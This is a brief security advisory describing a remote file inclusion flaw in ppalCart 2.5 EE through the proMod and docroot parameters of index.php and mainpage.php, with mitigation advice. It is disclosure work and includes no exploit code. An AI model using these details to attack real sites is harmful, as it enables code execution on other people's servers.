Momo26

**Name of the Vulnerable Software and Affected Versions** ppalCart version 2.5 EE **Description** A remote file inclusion issue allows attackers to execute arbitrary PHP code. This can be achieved by providing a URL in the `proMod` parameter to "index.php", or the `docroot` parameter to "index.php" or "mainpage.php". **Recommendations** For ppalCart version 2.5 EE, consider disabling access to the `proMod` and `docroot` parameters in the affected API endpoints "index.php" and "mainpage.php" until a patch is available. Restrict access to these endpoints to minimize the risk of exploitation.